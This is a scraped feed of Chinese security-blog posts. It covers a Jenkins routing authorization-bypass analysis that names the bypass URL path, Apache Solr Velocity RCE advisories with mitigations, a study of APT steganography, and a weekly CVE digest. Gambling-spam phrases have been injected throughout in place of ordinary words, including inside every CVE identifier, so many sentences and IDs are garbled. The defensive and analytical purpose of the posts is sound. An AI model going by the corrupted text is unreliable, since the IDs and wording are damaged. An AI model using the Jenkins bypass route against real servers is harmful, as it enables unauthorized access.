  • 影响版本:Jenkins<=2.153 / Jenkins LTS<=2.138.3

这是一个动态路由绕过导致未授权访问的问题,由Orange提交:)参考 Hacking Jenkins Part 1 – Play with Dynamic Routing

白名单机制

上面分析了Jenkins构建动态路由的过程,主要调用的是org.kohsuke.stapler.Stapler#tryInvoke()方法,该方法对所属于StaplerProxy的类会有一次权限检查,而一开始我们知道除了boundObjectTable其他的node都被设置为hudson.model.Hudson,上面也讲到Hudson类继承自Jenkins,而Jenkins的父类AbstractCIBase是StaplerProxy的一个接口实现,所以除了boundObjectTable外所有node都会进行这个权限检查,具体实现在jenkins.model.Jenkins#getTarget()中

这个方法会先进行一次checkPermission,如果没有权限则会抛出异常还会再进行一次isSubjectToMandatoryReadPermissionCheck检查,如果这个检查通过同样会正常返回

这个检查中有一个白名单,如果存在于这个白名单中的url路由同样可以直接访问

ALWAYS_READABLE_PATHS = ImmutableSet.of("/login", "/logout", "/accessDenied", "/adjuncts/", "/error", "/oops", new String[] {
    "/signup",
    "/tcpSlaveAgentListener",
    "/federatedLoginService/",
    "/securityRealm",
    "/instance-identity"
});

还是以/securityRealm/user/admin/为例,在解析至securityRealm的时候命中白名单,正常返回,而解析至admin的时候因为User类并非StaplerProxy子类,所以会跳过getTarget()检查,成功绕过

跨物件操作

接下来关注DescriptorByName

从继承关系图可以看到User也是DescriptorByNameOwner接口的实现

而DescriptorByNameOwner接口调用的是 jenkins.model.Jenkins#getDescriptor

public interface DescriptorByNameOwner extends ModelObject {
    default Descriptor getDescriptorByName(String id) {
        return Jenkins.getInstance().getDescriptorByName(id);
    }
}

该方法首先获取了所有的descriptors,如果传入的id匹配到了相应的descriptor就能去调用指定的方法,例如org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript#DescriptorImpl,getDisplayName()和doCheckScript()都是能被调用到的

因此,通过构造/securityRealm/user/DescriptorByName/xxx的方式就可以调用到任意类的任意方法,只要满足下面两个条件:

  1. 符合上文整理的命名规则;
  2. 目标类继承了Descriptor;

利用链:

Jenkins->HudsonPrivateSecurityRealm->User->DescriptorByNameOwner->Jenkins->Descriptor

在这个漏洞修复后还想再利用则必须开启Allow anonymous read access匿名用户访问权限,否则会抛出404

总结

本报告上篇讨论了Jenkins动态路由机制和路由绕过的问题,通过这个脆弱点可以绕过用户权限检查从而访问到特定的物件,为下一步进行远程代码执行漏洞攻击降低了攻击门槛,是一个非常巧妙的入口。下篇将分析Jenkins主流插件Script Security中针对Groovy沙箱的绕过方法,欢迎关注。

参考

关于作者

kylinking 专注于代码审计、Web安全2017最新注册送体验

关于绿盟科技天机实验室

天机实验室专注于漏洞挖掘与利用技术2017最新注册送体验。 2017最新注册送体验方向主要包括漏洞挖掘技术2017最新注册送体验、漏洞分析技术2017最新注册送体验、漏洞利用技术2017最新注册送体验、安全防御机制及对抗技术2017最新注册送体验等。2017最新注册送体验目标涵盖主流操作系统、流行的应用系统及软件、重要的基础组件库以及新兴的技术方向。

文章来源:绿盟科技博客
]]>
http://blog.cholochitro.com/jenkins-routing-resolution-and-sandbox-bypass-vulnerability-analysis-report/feed/ 0
【威胁通告】Apache Solr Velocity远程代码执行漏洞处置手册 http://blog.cholochitro.com/ns-2019-0046/ http://blog.nsfocus.net/ns-2019-0046/#respond Thu, 31 Oct 2019 08:56:23 +0000 http://blog.cholochitro.com/?p=16109 危害等级高,攻击者利用此漏洞,可造成远程代码执行。

一.  漏洞概述

10月30日,@_S00pY公开了Apache Solr 远程代码执行漏洞的利用方式,攻击者可通过Velocity模板实现远程代码执行。经测试,该漏洞可以成功触发,且官方未发布安全补丁。

此漏洞的触发需要两步完成,首先攻击者需通过config API将”params.resource.loader.enabled”配置项修改为true;再通过发送恶意velocity模板完成漏洞触发。

部分PoC代码如下:

利用成功后可在服务端执行任意命令。

二、影响范围

受影响版本

  • Apache Solr <= 8.2.0 (存在config API的版本均可能受此漏洞影响)

三、漏洞检测

人工检测

满足下面任意一项,当前系统均可能受此漏洞影响。

  1. 可访问http://hostname/solr/实例名/config,config API开放。
  2. 在实例的配置目录下存在configoverlay.json文件,且其中有”params.resource.loader.enabled”:”true”配置项,默认情况下不存在configoverlay.json文件。

3、在全局配置文件solrconfig.xml中,“params.resource.loader.enabled”配置项为“true”

四、漏洞防护

4.1 产品防护

部署有绿盟科技网络入侵防护系统(IPS)的用户,可实现对此漏洞的防护,对应规则:23982.

4.2 临时缓解措施

  • 用户可通过在访问控制上禁用对/solr/实例名/config路径的访问。
  • 若configoverlay.json 配置文件中存在”params.resource.loader.enabled”:”true”配置项。将其改为false。
  • 若solrconfig.xml 配置文件中,VelocityResponseWriter中存在如下配置<bool name=”params.resource.loader.enabled”>true</bool>,将其修改为false。
  • 添加安全认证,详细配置方法可参考官方文档:

http://lucene.apache.org/solr/guide/8_2/basic-authentication-plugin.html#basic-authentication-plugin

声明

本安全2018博彩游戏网站大全仅用来描述可能存在的安全问题,绿盟科技不为此安全2018博彩游戏网站大全提供任何保证或承诺。由于传播、利用此安全2018博彩游戏网站大全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,绿盟科技以及安全2018博彩游戏网站大全作者不为此承担任何责任。

绿盟科技拥有对此安全2018博彩游戏网站大全的修改和解释权。如欲转载或传播此安全2018博彩游戏网站大全,必须保证此安全2018博彩游戏网站大全的完整性,包括版权声明等全部内容。未经绿盟科技允许,不得任意修改或者增减此安全2018博彩游戏网站大全内容,不得以任何方式将其用于商业目的。

关于绿盟科技                                                

北京神州绿盟信息安全科技股份有限公司(简称绿盟科技)成立于2000年4月,总部位于北京。在国内外设有30多个分支机构,为政府、运营商、金融、能源、互联网以及教育、医疗等行业用户,提供具有核心竞争力的安全产品及解决方案,帮助客户实现业务的安全顺畅运行。

基于多年的安全攻防2017最新注册送体验,绿盟科技在网络及终端安全、互联网基础安全、合规及安全管理等领域,为客户提供入侵检测/防护、抗拒绝服务攻击、远程安全评估以及Web安全防护等产品以及专业安全服务。

北京神州绿盟信息安全科技股份有限公司于2014年1月29日起在深圳证券交易所创业板上市,股票简称:绿盟科技,股票代码:300369。

文章来源:绿盟科技博客
]]>
http://blog.cholochitro.com/ns-2019-0046/feed/ 0
【威胁通告】 Apache Solr远程命令执行漏洞 http://blog.cholochitro.com/apache-solr2019-10-31/ http://blog.nsfocus.net/apache-solr2019-10-31/#respond Thu, 31 Oct 2019 07:20:21 +0000 http://blog.cholochitro.com/?p=16107 今日,国外的安全2017最新注册送体验员_S00pY在GitHub发布了关于Apache Solr利用Velocity模板来达成远程命令执行的POC。绿盟科技2017最新注册送体验人员经分析后确认该POC有效,造成的影响较大。Apache Solr官方尚未发布相关补丁修复该漏洞。

综述

今日,国外的安全2017最新注册送体验员_S00pY在GitHub发布了关于Apache Solr利用Velocity模板来达成远程命令执行的POC。绿盟科技2017最新注册送体验人员经分析后确认该POC有效,造成的影响较大。Apache Solr官方尚未发布相关补丁修复该漏洞。

参考链接:

https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133

绿盟科技预警级别:【蓝色】

级别定义请参考后文绿盟科技安全预警定级说明部分

影响产品版本

具体影响版本未知,经测试以下版本受影响:

  • Apache Solr 8.2.0  (最新版本)

不受影响产品版本

Apache Solr目前尚未发布新版本修复该漏洞

解决方案

Apache Solr官方尚未发布补丁修复该漏洞,请用户保持关注。

https://lucene.apache.org/solr/

用户可以检查是否存在Configoverlay.json配置文件,并且确保其中的 “solr.resource.loader.enabled”设置为False,并且开启Solr实例安全认证来进行临时防护。

绿盟科技安全预警定级说明

级别 级别说明
红色 影响范围极大,危害极高,利用难度低
橙色 影响范围较广,危害严重,利用难度较低
黄色 影响范围可控,危害程度可控,利用难度较高
蓝色 影响较小,危害程度较小,利用条件苛刻

声 明

本安全2018博彩游戏网站大全仅用来描述可能存在的安全问题,绿盟科技不为此安全2018博彩游戏网站大全提供任何保证或承诺。由于传播、利用此安全2018博彩游戏网站大全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,绿盟科技以及安全2018博彩游戏网站大全作者不为此承担任何责任。绿盟科技拥有对此安全2018博彩游戏网站大全的修改和解释权。如欲转载或传播此安全2018博彩游戏网站大全,必须保证此安全2018博彩游戏网站大全的完整性,包括版权声明等全部内容。未经绿盟科技允许,不得任意修改或者增减此安全2018博彩游戏网站大全内容,不得以任何方式将其用于商业目的。

关于绿盟科技

北京神州绿盟信息安全科技股份有限公司(简称绿盟科技)成立于2000年4月,总部位于北京。在国内外设有30多个分支机构,为政府、运营商、金融、能源、互联网以及教育、医疗等行业用户,提供具有核心竞争力的安全产品及解决方案,帮助客户实现业务的安全顺畅运行。

基于多年的安全攻防2017最新注册送体验,绿盟科技在网络及终端安全、互联网基础安全、合规及安全管理等领域,为客户提供入侵检测/防护、抗拒绝服务攻击、远程安全评估以及Web安全防护等产品以及专业安全服务。

北京神州绿盟信息安全科技股份有限公司于2014年1月29日起在深圳证券交易所创业板上市,股票简称:绿盟科技,股票代码:300369。

文章来源:绿盟科技博客
]]>
http://blog.cholochitro.com/apache-solr2019-10-31/feed/ 0
APT技术观察——APT与隐写术 http://blog.cholochitro.com/apt-technology-observation-apt-and-steganography/ http://blog.nsfocus.net/apt-technology-observation-apt-and-steganography/#respond Tue, 29 Oct 2019 06:58:33 +0000 http://blog.cholochitro.com/?p=16087 近期披露的APT组织攻击活动中,我们发现部分组织频繁使用一项历史悠久的信息隐藏技术——隐写术。这些隐写术的实现或复杂或简单,但都有效地增加了攻击的隐匿性与强度。

前言

 作为有高度攻击能力的团伙代表,APT组织有时会使用一些非常规的攻击技术。近期披露的APT组织攻击活动中,我们发现部分组织频繁使用一项历史悠久的信息隐藏技术——隐写术。这些隐写术的实现或复杂或简单,但都有效地增加了攻击的隐匿性与强度。

关于隐写术

隐写术(Steganography)一词来源于特里特米乌斯的一本讲述密码学与隐写术的著作Steganographia,该书书名源于希腊语,意为“隐秘书写”。

计算机领域涉及的隐写术载体十分广泛,文本信息、图像信息、音频和视频信息都可以成为隐藏信息的载体,我们只需要将需隐藏的信息拆散并用固定的格式覆写至信息载体中,就可以实现在欺骗人类感官的同时传递信息。这些隐写术配合一定复杂度的加密技术,即可在相当程度上保证端到端信息传递的隐蔽性,因此该技术经常出现在灰色、黑色领域以及网络攻防对抗当中。

APT组织使用的隐写术

海莲花(OceanLutus)与图像隐写

我们先来看一下大名鼎鼎的海莲花组织在2018年10月的一次攻击中使用的隐写术技术。

该次攻击的原始载荷是一个名为mcvsocfg.dll的动态链接库文件,该文件模仿McAfee旗下同名文件的导出表,使用白利用的方式将自身加载运行。当受害者打开同目录下的安全程序mcods.exe时,该dll中的恶意代码被调用执行。

Dll文件包含以下导出表:

导出表中所有函数都执行同样的恶意代码,读取system.ini文件并以此解密隐写术图像中的信息:

隐写术图像在dll同目录下,名为x5j3trra.Png:

阅读关键代码可发现,该程序将png图像每个像素RGB值的低位拼合成一个字节,再将所有字节组合为加密字节串:

此处dwARGB值在内存中遵循BGRA的字节排列,因此每个像素的隐藏信息提取过程如下(以图片头部像素0xFF4586E2为例):

以上提取结果为0xB5,即图像的此像素中隐藏了值为0xB5的单字节信息。

通过以上方式,程序将隐藏在png图像中的加密字节串提取出来,之后使用AES-CBC和异或解密出最终载荷:

该最终载荷为多层shellcode加载器形式的DenesRAT木马,详细分析可参见由伏影实验室发布的《海莲花(APT32)组织 DenesRAT木马与相关攻击链分析》。

在这次攻击中,海莲花组织使用了最常见的隐写术手法——图片像素低位隐写,这样的手段生成的图像足以欺骗人类的视觉;再通过有一定难度的加密方式,使得安全人员即使获取到了包含隐写信息的图像也无法还原出攻击载荷,大大增加了攻击流程的隐匿性。

Dukes(APT29)与图像隐写

同样的手段出现在APT组织Dukes的攻击流程中。在最近由ESET披露的攻击活动中,Dukes使用的攻击载荷PolyglotDuke与RegDuke在C&C通信阶段使用了图像隐写术作为隐匿手段。这些载荷使用的隐写方式与上文所述海莲花隐写术基本相同,在png图像每个像素RGB值的低位中存放了1字节的信息,且完整信息同样是使用AES加密的密文,唯一不同点在于取用的RGB像素位与最终拼接顺序。该隐写方式取用的RGB通道位置、位数及组合方式示例如下:

同时,ESET的报告中展示了以下隐写图像:

由此可以看出,该类隐写技术几乎不会对图像的可视性带来影响。

使用图像隐写,Dukes的C&C服务器可以向种植了PolyglotDuke或RegDuke后门的主机发送可执行文件载荷。

ScarCruft(APT37)与图像隐写

无独有偶,韩国APT组织ScarCruft在今年的攻击活动中也利用了隐写术图像。

该攻击事件在19年5月被发现,整个攻击过程包括多个阶段与载荷,其中使用隐写术的攻击载荷名为fastuserswitchingcompatibility.dll,伪装成Fast User Switching Compatibility服务安装至系统服务中。该伪造服务在启动时会执行ServiceMain函数,装载主要恶意代码:

图中所示线程主要功能为从下载服务器下载下一阶段载荷,之后解密载荷并注入至winlogon.exe中执行。值得注意的是,该下载载荷和解密载荷的过程使用了图片隐写,图像名为images.Png:

该png图像在常规数据块IHDR、PLTE、IDAT、IEND以外,末尾还加入了一个自定义的数据块SIGN,与前4字节组成标志位SELFSIGN:

通过该标志位定位加密字符串位置后,程序使用xor逻辑进行解密,异或键为0x49:

解密后的攻击载荷为ROKRAT后门,其主要功能为窃取用户主机信息并上传至指定云服务中(Box, Dropbox, Pcloud, Yandex)。该后门会被植入到winlogon.exe进程中。

该次攻击事件中,ScarCruft组织使用了图片隐写更直接的手法,即直接将加密数据植入图像数据末尾。该手法优点在于可以在同等大小的图像中塞入更多隐藏信息,而缺点在于数据整体暴露在合法文件结构以外,容易被静态检测手段检测。

白金(Platinum)与文本隐写

卡巴斯基在今年5月的报告中提到, APT组织Platinum也在使用隐写术传递载荷。

与海莲花和ScarCruft不同,Platinum使用了文本隐写术。卡巴斯基报告中提到了两种文本隐写术手法:关键词隐写和空白隐写。这两种文本隐写方式的思路截然相反,关键词隐写将内容隐藏在可见字符中,空白隐写则将之隐藏至不可见部分。

报告中提到的关键词隐写部分如下:

该html文件的28行到37行语句中包含四个属性:bgcolor、align、colspan、rowspan。由于html对属性的顺序不敏感,这些属性的位置可以随意调换,Platinum正是利用了这一点来传递信息。简单计算可知,这四个属性组成的四进制数据有24种不同的排列,可指代0至0x17的十六进制数据,因此一行携带的隐藏信息量超过了4bit。

空白隐写则如下所示:

位于文件943~947行的隐写内容由空格键(0x20)和制表键(0x9)组成,因此对阅读者不可见。由关键词隐写我们可以联想到,该部分的隐写内容是二进制数据,事实也正是如此。然而,由于二进制数据能够装载的信息很有限,常规数据一般需要经过压缩来获得更小的二进制空间。卡巴斯基报告指出,该处的二进制数据是由ICE算法压缩的(http://www.darkside.com.au/snow/)。

 从Platinum组织使用的隐写术中可以发现,隐写术的本质是将二进制数据转为其他进制数据并放入合适的载体中。因此,隐写术的载体可以是现代计算机网络中任何信息载体形式,攻击者是否使用隐写术更多取决于载体是否易于传播以及转换后信息是否足够隐蔽。

参考链接

https://threatvector.cylance.com/en_us/home/report-oceanlotus-apt-group-leveraging-steganography.html

https://www.welivesecurity.com/2019/10/17/operation-ghost-dukes-never-left/

https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/

https://securelist.com/platinum-is-back/91135/

http://www.darkside.com.au/snow/

关于伏影实验室

伏影实验室专注于安全威胁2017最新注册送体验与监测技术,包括但不限于威胁识别技术,威胁跟踪技术,威胁捕获技术,威胁主体识别技术。2017最新注册送体验目标包括:僵尸网络威胁,DDOS对抗,WEB对抗,流行服务系统脆弱利用威胁、身份认证威胁,数字资产威胁,黑色产业威胁 及 新兴威胁。通过掌控现网威胁来识别风险,缓解威胁伤害,为威胁对抗提供决策支撑。

关于绿盟威胁情报中心

绿盟威胁情报中心(NSFOCUS Threat Intelligence center, NTI)是绿盟科技为落实智慧安全2.0战略,促进网络空间安全生态建设和威胁情报应用,增强客户攻防对抗能力而组建的专业性安全2017最新注册送体验组织。其依托公司专业的安全团队和强大的安全2017最新注册送体验能力,对全球网络安全威胁和态势进行持续观察和分析,以威胁情报的生产、运营、应用等能力及关键技术作为核心2017最新注册送体验内容,推出了绿盟威胁情报平台以及一系列集成威胁情报的新一代安全产品,为用户提供可操作的情报数据、专业的情报服务和高效的威胁防护能力,帮助用户更好地了解和应对各类网络威胁。

文章来源:绿盟科技博客
]]>
http://blog.cholochitro.com/apt-technology-observation-apt-and-steganography/feed/ 0
绿盟科技互联网安全威胁周报NSFOCUS-2019-43 http://blog.cholochitro.com/nsfocus-2019-43/ http://blog.nsfocus.net/nsfocus-2019-43/#respond Mon, 28 Oct 2019 10:54:46 +0000 http://blog.cholochitro.com/?p=16073 截止到2019年10月25日,绿盟科技漏洞库已收录总条目达到44951条。本周新增漏洞记录211条,其中高危漏洞数量81条,中危漏洞数量96条,低危漏洞数量34条。

Linux kernel 5.3.6之前版本,drivers/net/wireless/realtek/rtlwifi/ps.c文件的rtl_p2p_noa_ie未正确验证数据边界,存在缓冲区溢出漏洞。攻击者可利用该漏洞导致缓冲区溢出。

焦点漏洞

  • Linux kernel rtl_p2p_noa_ie缓冲区溢出漏洞
    • CVE ID
      • 2018年送彩金网站大全2019-17666
    • NSFOCUS ID
      • 44855
    • 受影响版本
      • Linux kernel 5.3.6
    • 漏洞点评
      • Linux kernel是开源操作系统Linux所使用的内核。Linux kernel 5.3.6之前版本,drivers/net/wireless/realtek/rtlwifi/ps.c文件的rtl_p2p_noa_ie未正确验证数据边界,存在缓冲区溢出漏洞。攻击者可利用该漏洞导致缓冲区溢出。目前厂商已经提供了补丁程序,请到厂商的相关页面以获取最新版本。

(数据来源:绿盟威胁情报中心)

一. 互联网安全威胁态势

1.1 CVE

最近一周CVE2018博彩游戏网站大全总数与前期相比有明显增长。

1.2 威胁信息回顾

  • 标题:php-fpm远程代码执行漏洞
    • 时间:2019-10-24
    • 简介:近日,国外安全2017最新注册送体验员公布了一个存在于php-fpm中的漏洞(2018年送彩金网站大全2019-11043),在某些特定Nginx 配置中,该漏洞可能会导致远程代码执行。
    • 链接:http://blog.cholochitro.com/2018年送彩金网站大全2019-11043/
  • 标题:Winnti组织针对Microsoft SQL Server的后门skip-2.0
    • 时间:2019-10-23
    • 简介:最近,2017最新注册送体验人员发现了针对Microsoft SQL(MSSQL)的后门程序skip-2.0,使攻击者能够在威胁活动中保持立足点。skip-2.0后门与Winnti使用的另一种工具PortReuse后门有很多相似之处,主要针对MSSQL Server 11和12。Winnti是一个与中国有关的威胁组织,至少从2010年开始活跃,主要针对视频游戏和软件行业,并以供应链攻击而闻名。
    • 链接:https://www.welivesecurity.com/2019/10/21/winnti-group-skip2-0-microsoft-sql-server-backdoor/
  • 标题:750万Adobe Creative Cloud用户的数据在线暴露
    • 时间:2019-10-26
    • 简介:Adobe遭受了重要的数据泄漏,750万Adobe Creative Cloud用户的数据已通过不安全的服务器在线暴露。Adobe Creative Cloud是Adobe Systems的一组应用程序和服务,使订户可以访问用于图形设计、视频编辑、Web开发、摄影的软件集合,以及一组移动应用程序以及一些可选的云服务。在Creative Cloud中,每月或每年的订阅服务都是通过Internet交付的,目前大约有1500万订户。
    • 链接:https://thehackernews.com/2019/10/adobe-database-leaked.html
  • 标题:攻击者利用Raccoon恶意软件窃取财务信息
    • 时间:2019-10-24
    • 简介:Raccoon恶意软件(又名Mohazo和Racealer)自2019年4月以来,一直在暗网中被积极售卖。Raccoon核心是一种信息窃取程序,通常在Fallout和RIG Exploit套件中看到,攻击者利用它可窃取信用卡信息、加密货币钱包、与浏览器相关的数据和邮件客户端等数据,已在全球范围内感染了成千上万的端点,涉及北美、欧洲和亚洲地区。
    • 链接:https://www.cybereason.com/blog/hunting-raccoon-stealer-the-new-masked-bandit-on-the-block
  • 标题:Ashas系列软件针对Android系统的攻击活动
    • 时间:2019-10-24
    • 简介:2017最新注册送体验人员在Google Play上发现了长达一年的Ashas软件活动,涉及42个应用程序和800万次的下载和安装。Ashas除了软件外,还在程序启动开始就会与其C&C服务器通信,发送有关受影响设备的关键数据:设备类型、操作系统版本、语言、已安装的应用程序数量、可用存储空间以及是否已安装Facebook和FB Messenger等。
    • 链接:https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/
  • 标题:Gustuff银行木马针对澳大利亚用户的攻击活动
    • 时间:2019-10-21
    • 简介:Gustuff是一个主要依靠恶意SMS消息来感染用户的银行木马。近期发现攻击者利用Gustuff新版本针对澳大利亚的银行和政府部门的攻击活动,该新版本主要针对招聘网站的移动应用程序。
    • 链接:https://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/
  • 标题:Stealthworker恶意软件针对多平台和服务的攻击
    • 时间:2019-10-23
    • 简介:今年早期,StealthWorker木马针对电商平台,并形成名为Stealthworker(GoBrut)的僵尸网络。近期发现Stealthworker活动更新了武器库,添加了针对多种平台和服务的暴力破解功能。
    • 链接:https://www.fortinet.com/blog/threat-research/unveiling-stealthworker-campaign.html

(数据来源:绿盟科技 威胁情报中心 收集整理)

二. 漏洞2017最新注册送体验

2.1 漏洞库

截止到2019年10月25日,绿盟科技漏洞库已收录总条目达到44951条。本周新增漏洞记录211条,其中高危漏洞数量81条,中危漏洞数量96条,低危漏洞数量34条。

  • Kibana远程代码执行漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7609
  • Cisco Firepower Management Center跨站脚本漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-15270
  • Cisco Firepower Management Center跨站脚本漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-15269
  • Cisco Firepower Management Center跨站脚本漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-15268
  • Cisco Firepower Management Center跨站脚本漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-15280
  • Cisco Identity Services Engine 跨站脚本漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-12637
  • Cisco Identity Services Engine 跨站脚本漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-15281
  • Cisco Identity Services Engine 跨站脚本漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-12638
  • Cisco SPA100 Series Analog Telephone Adapters信息泄露漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-12708
  • Cisco SPA100 Series Analog Telephone Adapters信息泄露漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-15257
  • Cisco SPA100 Series Analog Telephone Adapters跨站脚本漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-12702
  • Cisco SPA100 Series Analog Telephone Adapters文件泄露漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-12704
  • Cisco SPA100 Series Analog Telephone Adapters拒绝服务漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-15258
  • Cisco TelePresence Collaboration Endpoint Software任意文件写漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-15273
  • Cisco TelePresence Collaboration Endpoint Software命令注入漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-15274
  • Cisco TelePresence Collaboration Endpoint Software任意文件写漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-15962
  • Cisco TelePresence Collaboration Endpoint Software权限提升漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-15275
  • Cisco TelePresence Collaboration Endpoint Software权限提升漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-15277
  • Cisco Wireless LAN Controller路径遍历漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-15266
  • Cisco Aironet Access PPTP拒绝服务漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-15261
  • Cisco Aironet Access Points/Catalyst 9100 Access Points CAPWAP拒绝服务漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-15264
  • Cisco SPA100 Series Analog Telephone Adapters远程代码执行漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-15243
  • Cisco SPA100 Series Analog Telephone Adapters远程代码执行漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-15244
  • Cisco SPA100 Series Analog Telephone Adapters远程代码执行漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-15252
  • Cisco SPA100 Series Analog Telephone Adapters远程代码执行漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-15245
  • Cisco SPA100 Series Analog Telephone Adapters远程代码执行漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-15246
  • Adobe Experience Manager命令注入任意代码执行漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-8088
  • Adobe Experience Manager Forms跨站脚本漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-8089
  • Adobe Experience Manager 跨站请求伪造信息泄露漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-8234
  • Adobe Experience Manager 跨站脚本信息泄露漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-8078
  • Adobe Experience Manager 跨站脚本信息泄露漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-8079
  • Adobe Experience Manager 跨站脚本信息泄露漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-8080
  • Adobe Experience Manager 身份验证绕过信息泄露漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-8081
  • Adobe Experience Manager XML外部实体注入信息泄露漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-8082
  • Adobe Experience Manager 跨站脚本信息泄露漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-8083
  • Adobe Experience Manager 跨站脚本信息泄露漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-8084
  • Adobe Experience Manager 跨站脚本信息泄露漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-8085
  • Adobe Experience Manager XML外部实体注入信息泄露漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-8086
  • Adobe Experience Manager XML外部实体注入信息泄露漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-8087
  • Adobe Download Manager 权限提升安全漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-8071
  • Cisco Wireless LAN Controller Secure Shell 拒绝服务漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-15262
  • Cisco SPA100 Series Analog Telephone Adapters远程代码执行漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-15240
  • Cisco SPA100 Series Analog Telephone Adapters远程代码执行漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-15241
  • Cisco SPA100 Series Analog Telephone Adapters远程代码执行漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-15242
  • Cisco SPA100 Series Analog Telephone Adapters远程代码执行漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-15250
  • Cisco SPA100 Series Analog Telephone Adapters远程代码执行漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-15249
  • Cisco SPA100 Series Analog Telephone Adapters远程代码执行漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-15248
  • Cisco SPA100 Series Analog Telephone Adapters远程代码执行漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-15247
  • Oracle Java SE/Java SE Embedded 组件安全漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-2949
  • Oracle Java SE/Java SE Embedded 组件安全漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-2958
  • Oracle Java SE/Java SE Embedded 组件安全漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-2989
  • Oracle Java SE 组件安全漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-11068
  • Oracle Java SE 组件安全漏洞(2018年送彩金网站大全2019-2977)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-2977
  • Oracle Java SE/Java SE Embedded 组件安全漏洞(2018年送彩金网站大全2019-2975)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-2975
  • Oracle Java SE 组件安全漏洞(2018年送彩金网站大全2019-2999)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-2999
  • Oracle Java SE/Java SE Embedded 组件安全漏洞(2018年送彩金网站大全2019-2996)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-2996
  • Oracle Java SE/Java SE Embedded 组件安全漏洞(2018年送彩金网站大全2019-2962)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-2962
  • Oracle Java SE 组件安全漏洞(2018年送彩金网站大全2019-2987)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-2987
  • Oracle Java SE/Java SE Embedded 组件安全漏洞(2018年送彩金网站大全2019-2988)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-2988
  • Oracle Java SE/Java SE Embedded 组件安全漏洞(2018年送彩金网站大全2019-2992)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-2992
  • Oracle Java SE/Java SE Embedded 组件安全漏洞(2018年送彩金网站大全2019-2964)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-2964
  • Oracle Java SE/Java SE Embedded 组件安全漏洞(2018年送彩金网站大全2019-2973)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-2973
  • Oracle MySQL Server产品安全漏洞(2018年送彩金网站大全2019-2911)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-2911
  • Oracle MySQL Server产品安全漏洞(2018年送彩金网站大全2019-2910)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-2910
  • Oracle MySQL Server产品安全漏洞(2018年送彩金网站大全2019-2938)
    • 危险等级:低
